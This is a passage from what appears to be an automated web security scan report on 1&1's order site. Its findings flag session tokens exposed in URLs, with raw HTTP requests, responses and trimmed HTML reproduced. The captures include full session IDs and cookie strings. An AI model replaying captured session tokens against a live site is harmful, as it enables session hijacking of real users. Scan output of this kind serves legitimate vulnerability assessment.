Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:24:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailInstantMail?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain


3.81. http://order.1and1.com/xml/order/MailXchange  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:24:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailXchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain


3.82. http://order.1and1.com/xml/order/MicrosoftExchange  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:25:09 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MicrosoftExchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Connection: close
Content-Type: text/plain


3.83. http://order.1and1.com/xml/order/Moneyback  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Moneyback

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Moneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Moneyback?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.84. http://order.1and1.com/xml/order/MsHosting  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=MsHosting&amp;linkOrigin=MsHosting&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=MsHosting&amp;page=switch&amp;linkOrigin=MsHosting&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.tab.linuxhosting" rel="button-hd-tab-linuxhosting"><span>
...[SNIP]...
<h2 class="nolink"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Hosting</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Service &amp; Support</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/FirstWebsite;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">First Website</a>
...[SNIP]...
<li><a rel="height=480, width=665" class="window-open core_button_normal" href="/xml/order/Moneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
90-Day Guarantee
</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">International Customers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/News;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">News</a>
...[SNIP]...
</h4><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;origin.page=MsHosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on"><img src="/oneandone_en_common/img/frontend-hosting/teaser/teaser_ngh.png" alt="" class="alphapng" title="1&amp;1 MyBusiness Site" width="112" height="70">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;origin.page=MsHosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on">


Details
</a>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-beginner-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-home-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-developer-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-beginner-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-home-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-developer-package-bundle"><span>
...[SNIP]...
<td class="feature-banner" colspan="5"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=590,screenX=100,screenY=100');" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><img src="/common/img/components/hosting/vis_softwarebundle.png" alt="Adobe Dreamweaver" class="software alphapng" width="98" height="66">
...[SNIP]...
<td class="feature-banner-link" colspan="5"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">New Features for Linux packages</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Included Domains
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainPdr;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Private Domain Registration
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDns;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
DNS Management
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Control Panel
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseDatabase;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebDatabase
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseAccess;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Access Database Supported
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseMssql;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
MS SQL Database
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailEmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
E-mail Accounts
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailWebmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebMail 2.0
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailVirusscan;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Spam Filter
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebsiteBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Adobe&reg; Dreamweaver&reg; CS4</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">NetObjects Fusion&reg; 1&amp;1 Edition</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingAsp;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Active Server Pages (ASP)
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingNet;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
ASP.net 3.5/.NET Framework
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDsc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
DynamicSiteCreator
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Photo Gallery
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Spreadshirt Merchandising
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
iStockphoto image library
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingElements;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 FormBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingContentmoduls;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Dynamic Content Catalog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Maps
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDriving;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Directions
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCgi;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Ready-to-Run CGI Library
</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureToolsRatepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
RatePoint
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Google&#8482; AdWords**
</a>
...[SNIP]...
